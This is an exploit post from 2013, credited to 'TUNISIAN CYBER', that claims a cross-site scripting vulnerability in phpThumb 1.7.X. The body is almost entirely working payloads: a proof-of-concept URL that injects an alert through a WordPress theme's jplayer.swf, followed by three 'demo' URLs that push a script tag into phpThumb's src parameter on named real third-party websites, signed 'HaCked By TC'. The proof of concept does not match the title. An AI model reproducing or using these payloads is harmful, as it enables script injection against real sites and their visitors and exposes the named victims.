facebook facebook twitter rss

phpThumb 1.7.X Cross Site Scripting vulnerability

Author: TUNISIAN CYBER , Published: 06-12-2013
X-------------------------------------------------------------X
_____ _ _ _ _ _____ _____ _____ ___ _ _ _______ _______ ___________
|_ _| | | | \ | |_ _/ ___|_ _|/ _ \ | \ | | / __ \ \ / / ___ \ ___| ___ \
| | | | | | \| | | | \ `--. | | / /_\ \| \| | | / \/\ V /| |_/ / |__ | |_/ /
| | | | | | . ` | | | `--. \ | | | _ || . ` | | | \ / | ___ \ __|| /
| | | |_| | |\ |_| |_/\__/ /_| |_| | | || |\ | | \__/\ | | | |_/ / |___| |\ \
\_/ \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/ \____/ \_/ \____/\____/\_| \_|
X-------------------------------------------------------------X


[+] Author: TUNISIAN CYBER
[+] Exploit Title: phpThumb 1.7.X Cross Site Scripting vulnerability
[+] Date: 6-12-2013
[+] Category: WebApp
[+] Google Dork: n/a
[+] Tested on: Win7 , ubuntu 13.04


########################################################################################


p.0.c:

http: //127.0.0.1/[Path]/wp-content/themes/moustachey/assets/js/plugins/jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day TUNISIAN CYBER/)//


Demos:
http://www.yes-group.ca/phpthumb/phpThumb.php?src=%22%3E%3Cscript%3Ealert%28%27HaCked%20By%20TC%27%29;%3C/script%3E
http://www.serimage.ro/phpthumb/phpThumb.php?src=%22%3E%3Cscript%3Ealert%28%27HaCked%20By%20TC%27%29;%3C/script%3E
http://www.esperanca.com.br/wp-content/themes/comfy/scripts/phpThumb/phpThumb.php?src=%22%3E%3Cscript%3Ealert%28%27HaCked%20By%20TC%27%29;%3C/script%3E


./3nD
########################################################################################

Like us on Facebook :